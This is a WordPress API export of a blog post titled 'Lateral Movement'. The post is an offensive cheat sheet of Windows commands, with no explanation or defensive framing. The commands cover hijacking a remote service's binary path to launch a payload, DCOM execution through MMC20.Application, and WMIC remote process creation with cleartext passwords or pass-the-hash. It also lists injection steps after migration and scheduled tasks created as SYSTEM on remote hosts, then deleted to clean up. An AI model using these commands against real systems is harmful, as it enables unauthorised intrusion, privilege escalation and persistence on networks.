{"id":159,"date":"2021-11-12T17:16:36","date_gmt":"2021-11-12T17:16:36","guid":{"rendered":"https:\/\/www.davincivirus.com\/?p=159"},"modified":"2021-11-12T17:16:36","modified_gmt":"2021-11-12T17:16:36","slug":"lateral-movement","status":"publish","type":"post","link":"https:\/\/www.davincivirus.com\/?p=159","title":{"rendered":"Lateral Movement"},"content":{"rendered":"\n<p><strong>Service Manipulation<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><em>(VSS is a commonly used service)\n<\/em>sc \\\\&lt;REMOTE_IP> query &lt;SERVICENAME>\nsc \\\\&lt;REMOTE_IP> qc &lt;SERVICENAME>\nsc \\\\&lt;REMOTE_IP> qfailure &lt;SERVICENAME>\nsc \\\\&lt;REMOTE_IP> config &lt;SERVICENAME> binpath= \"&lt;PAYLOAD LOC>\"\nsc \\\\&lt;REMOTE_IP> start &lt;SERVICENAME>\nsc \\\\&lt;REMOTE_IP> config &lt;SERVICENAME> binpath= \"&lt;ORIGINAL FILE LOC>\"\nsc \\\\&lt;REMOTE_IP> qc &lt;SERVICENAME><\/code><\/pre>\n\n\n\n<p><strong>COM Object<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>(&#91;activator]::CreateInstance(&#91;type]::GetTypeFromProgID(\u201cMMC20.Application\u201d,\u201d&lt;IPToTarget>\u201d))).Document.ActiveView.ExecuteShellCommand(\u201c&lt;CommandToExec>\u201d,$null,$null,\u201d7\u201d)<\/code><\/pre>\n\n\n\n<p><strong>WMIC<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>WMIC \/NODE:\"&lt;IP OR HOSTNAME>\" \/USER:\"&lt;DOMAIN\\USERNAME>\" \/PASSWORD:\"&lt;CLEARTEXT_PW>\" PROCESS CALL CREATE \"&lt;PAYLOAD_FILE_LOC>\"\n<em>    -or w\/ PTH-\n<\/em>WMIC \/NODE:\"&lt;IP OR HOSTNAME>\" PROCESS CALL CREATE \"&lt;PAYLOAD_FILE_LOC>\"\n\n<em>(Below should be Called after migration with WMIC)\n<\/em>    getprivs\n    ppid &lt;random SYSTEM process PID>\n    execute c:\\windows\\system32\\upnpcont.exe\n    inject &lt;new process ID> x64\r<\/code><\/pre>\n\n\n\n<p><strong>SCHTASKS<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><em>(IF PRIVILEGED - RU and SC ONLOGON options are available)\n<\/em>schtasks.exe \/Create \/S &lt;IP or HOSTNAME> \/F \/RU SYSTEM \/SC ONLOGON \/TN \"&lt;TASKNAME>\" \/TR \"&lt;PAYLOAD_FILEPATH>\"\nschtasks.exe \/run \/s &lt;IP or HOSTNAME> \/TN &lt;TASKNAME>\nschtasks.exe \/DELETE \/F \/TN \"&lt;TASKNAME>\" \r<\/code><\/pre>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Service Manipulation COM Object WMIC SCHTASKS<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts\/159"}],"collection":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=159"}],"version-history":[{"count":1,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts\/159\/revisions"}],"predecessor-version":[{"id":160,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts\/159\/revisions\/160"}],"wp:attachment":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=159"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=159"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=159"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}